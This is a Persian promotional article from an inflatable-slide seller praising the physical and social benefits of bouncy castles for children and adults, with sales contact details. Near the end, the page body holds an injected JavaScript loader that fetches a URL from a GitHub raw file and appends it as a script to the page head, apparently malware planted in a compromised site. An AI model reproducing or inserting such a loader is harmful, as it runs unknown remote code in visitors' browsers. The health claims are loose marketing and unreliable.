فواید قلعه بادی ( سرسره )
فواید قلعه بادی ( سرسره )

فواید قلعه بادی ( سرسره )

 • یکی فواید قلعه بادی در تفریحات کودکان و بزرگ سالان است. سرسره بازی که مزایای زیادی برای کودکان و بزرگ سالان دارد که ما در اینجا به این فایده می پردازیم

  فواید قلعه بادی ( سرسره ) چیست؟

  سرسره بازی و سرسره بادی بخاطر بالا رفتن از پله ها و سرخوردن طبیعتا بازی فیزیکی محسوب میشه،و همین تحرک برای

  کودکان هم میتونه مفید باشه.یکی دیگه از فواید سرسره بادی این هست که بچه ها با هم بازی میکنن،و یه محیط شاد و

  کودکانه در کنار هم دارن.

  البته این بازی برای عضلات ،گردش خون و تنفس کودکان هم مفید هستش.

  اصلا شاید بزرگترین فایده هم این باشه از فضای مجازی و بازی های کامپیوتری برای دقایقی هم که شده دور باشن

  منافع سرسره کم نیست و به سلامتی کودک کمک بسیار زیادی می‌کند. از دیگر محاسن این بازی می‌توان به عملکرد بهتر شش و‌ قلب اشاره کرد. این وسایل بازی در شهربازی‌های بزرگ و کوچک، پارک‌های مجهز و معمولی وجود دارند. این وسایل بازی در طراحی و رنگ‌های گوناگون تولید شده و از وسایل مهم پارک‌ها و شهربازی‌ها هستند.

  محبوبیت و فواید سرسره بازی

  محبوبیت سرسره بادی از دیرباز نزد کودکان و حتی بزرگ‌سالان بسیار بوده است. بازی با آن به دلیل هیجان بالایی که سرخوردن ناگهانی از یک شیب تند ایجاد می‌کند، بسیار فرح‌بخش و شادی‌آور است. از فواید سرسره بازی می‌توان به فیزیکی بودن این بازی اشاره کرد. بالا رفتن از نردبان یا پلکان آن ورزش خوبی برای کودکان است و سرعتی که کودکان به دلیل اشتیاق سرخوردن در بالا رفتن ایجاد می‌کنند، تمرین خوبی برای عضلات، بالا رفتن ضربان قلب، گردش خون و تنفس آن‌هاست.

  فواید قلعه بادی بازی برای بزرگسالان

  سرسره بادی علاوه بر کودکان برای بزرگسالان نیز فواید زیادی دارد. از جمله فواید سرسره بازی برای بزرگسالان می‌توان به این مورد اشاره کرد که سرسره بازی سبب افزایش قدرت و تقویت عضلات بزرگسالان می‌شود.بیشتر بزرگسالان در محیط‌های اداری کار می‌کنند و این موضوع سبب می‌شود تا تحرک نداشته باشند و همواره در یک مکان نشسته باشند.


  فواید سرسره بازی برای کودکان

  سرسره برای کودکان فواید زیاد دارد از جمله فواید سرسره بازی کودکان می‌توان به این اشاره کرد که سرسره کودکان را تا مدت طولانی سرگرم می‌کند. این وسایل بازی ساده می‌توانند هیجانات کودک را افزایش داده و تجربه عالی در بازی کودک باشند.

  مسلماً همه کودکان به این نوع وسایل بازی علاقه زیادی دارند و دوست دارند ساعت‌ها با آنها بازی کنند. دیگر فواید سرسره بازی کودکان تعادل در حس شنوایی کودکان است. از دیگر فواید می‌توان به افزایش رشد مهارت‌های فیزیکی کودک اشاره کرد.

  کودکان برای بازی با این وسایل بازی نیاز به حرکات مفاصل و عضلات خود دارند. از طرف دیگر سرسره بادی سبب حرکات ظریف دست کودکان می‌شود چرا که کودکان برای بالا رفتن از پله ها از دست و انگشت‌های خود کمک می‌گیرند. از دیگر فواید سرسره می‌توان به پرورش حس عمقی کودکان اشاره کرد.

  نحوه خرید سرسره بادی

  تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خریدقصر بادی توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید